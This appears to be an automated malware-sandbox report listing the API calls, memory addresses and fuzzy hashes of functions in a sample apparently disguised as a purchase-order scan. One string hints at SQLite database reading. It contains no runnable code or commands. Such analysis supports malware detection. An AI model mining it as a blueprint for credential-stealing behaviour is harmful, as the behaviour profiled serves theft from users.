                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                APIs
                                                                                • free.MSVCRT ref: 0040F561
                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$free
                                                                                • String ID: g4@
                                                                                • API String ID: 2888793982-2133833424
                                                                                • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: @
                                                                                • API String ID: 3510742995-2766056989
                                                                                • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                APIs
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                • memset.MSVCRT ref: 0040AF18
                                                                                • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@??3@memcpymemset
                                                                                • String ID:
                                                                                • API String ID: 1865533344-0
                                                                                • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004144E7
                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                • memset.MSVCRT ref: 0041451A
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1127616056-0
                                                                                • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                APIs
                                                                                • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                • memset.MSVCRT ref: 0042FED3
                                                                                • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$memset
                                                                                • String ID: sqlite_master
                                                                                • API String ID: 438689982-3163232059
                                                                                • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                • wcscpy.MSVCRT ref: 00414DF3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                • String ID:
                                                                                • API String ID: 3917621476-0
                                                                                • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                APIs
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                • _snwprintf.MSVCRT ref: 00410FE1
                                                                                • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                • _snwprintf.MSVCRT ref: 0041100C
                                                                                • wcscat.MSVCRT ref: 0041101F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                • String ID:
                                                                                • API String ID: 822687973-0
                                                                                • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                APIs
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                • malloc.MSVCRT ref: 00417459
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                                                • free.MSVCRT ref: 0041747F
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$freemalloc
                                                                                • String ID:
                                                                                • API String ID: 2605342592-0
                                                                                • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 2678498856-0
                                                                                • Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                • Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
                                                                                • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Item
                                                                                • String ID:
                                                                                • API String ID: 3888421826-0
                                                                                • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00417B7B
                                                                                • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                • GetLastError.KERNEL32 ref: 00417BB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$ErrorLastLockUnlockmemset
                                                                                • String ID:
                                                                                • API String ID: 3727323765-0
                                                                                • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F673
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                • strlen.MSVCRT ref: 0040F6A2
                                                                                • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040F6E2
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                • strlen.MSVCRT ref: 0040F70D
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00402FD7
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                • strlen.MSVCRT ref: 00403006
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                • String ID:
                                                                                • API String ID: 2754987064-0
                                                                                • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                APIs
                                                                                  • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                  • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                  • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                • String ID:
                                                                                • API String ID: 764393265-0
                                                                                • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                APIs
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: Time$System$File$LocalSpecific
                                                                                • String ID:
                                                                                • API String ID: 979780441-0
                                                                                • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                APIs
                                                                                • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$DialogHandleModuleParam
                                                                                • String ID:
                                                                                • API String ID: 1386444988-0
                                                                                • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.2746860768.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000005.00000002.2746860768.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000005.00000002.2746860768.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateMessageRectSend
                                                                                • String ID: d=E
                                                                                • API String ID: 909852535-3703654223
                                                                                • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
